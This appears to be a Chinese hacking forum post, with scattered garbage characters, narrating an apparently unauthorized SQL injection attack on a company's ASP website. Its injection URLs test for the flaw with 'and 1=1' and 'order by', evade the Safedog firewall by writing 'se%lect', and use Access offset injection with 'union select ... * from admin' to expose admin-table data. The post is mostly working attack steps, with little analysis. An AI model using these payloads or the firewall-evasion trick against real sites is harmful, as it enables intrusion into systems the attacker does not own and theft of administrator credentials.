打开网站,一个企业站。* l) @. _. Q6 N3 D% f4 v
$ z3 ^$ x/ Y D
% \6 y; q( H" B; v6 b顺手加个admin
5 {7 H; }6 G: M
% X) S' O, N' l$ ^$ ~* {7 Q* L+ _9 Z2 {2 N3 J5 b
默认后台。
9 s3 v3 o2 O* Y$ A3 z1 c2 n回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。& Y l9 F+ L% | p- x$ m1 Q3 t
4 o$ S; L3 A( z5 H% E" L! _
% @ b& m4 S8 \3 c. L' R9 m8 r0 ^5 [' y9 [3 z) A
所以就不用御剑扫了,待会直接封IP。& V8 u" G" k& `7 e* B3 u. |
9 v4 {5 E2 H. {/ b; V
用order by语句判断是否存在注入。$ g2 I1 m! r. ? d! S
http://www.xxx.com /product_show.asp?id=997 order by 1
; H0 _. J" ]4 R N8 ^# M6 ehttp://www.xxx.com /product_show.asp?id=997 order by 100
8 V' [ } z/ z, Y现在存在注入,经测试后发现是9个字段。$ c1 q: @4 @ g% C: B4 ]
/ N# J9 q/ O& {: }; ~4 ?1 `5 c6 G接下来进行联合查询,猜是否存在admin表。6 Z( P2 R4 c' O/ B$ V: J
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
* ? J+ d! m7 b$ n- M0 D B; y$ d& _/ \4 q5 b9 y' f" _: ]
0 L9 P% Y& w6 A
8 D& c" c) ~8 U& s$ u在select中间加个%,se%lect绕过安全狗。
4 e; G. j& l; E( K2 m
) c. ~: v( z7 S5 P: V1 y" W# W! B. q9 a
发现存在admin表,然后开始手工猜常用的字段。! k) Y" q0 g* R# K8 W, y; @
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。. x3 A6 F( [+ y" v3 l
( t/ ?: m$ B* z; `, P2 G a! h
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。$ N. H- u6 j9 C' p; y! s" |
8 z& B2 k, U0 i, t! G0 q0 `& g% ?
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
$ x ^& m, t- ^& mhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin5 Q W$ }. \( p# Z
好了,敏感内容出显了。
4 b* L# v! f) L) C, \
; ~! z/ s" K6 Y* t( a/ e
' h1 I; `4 ?( a/ H8 O) j# k4 g. h
|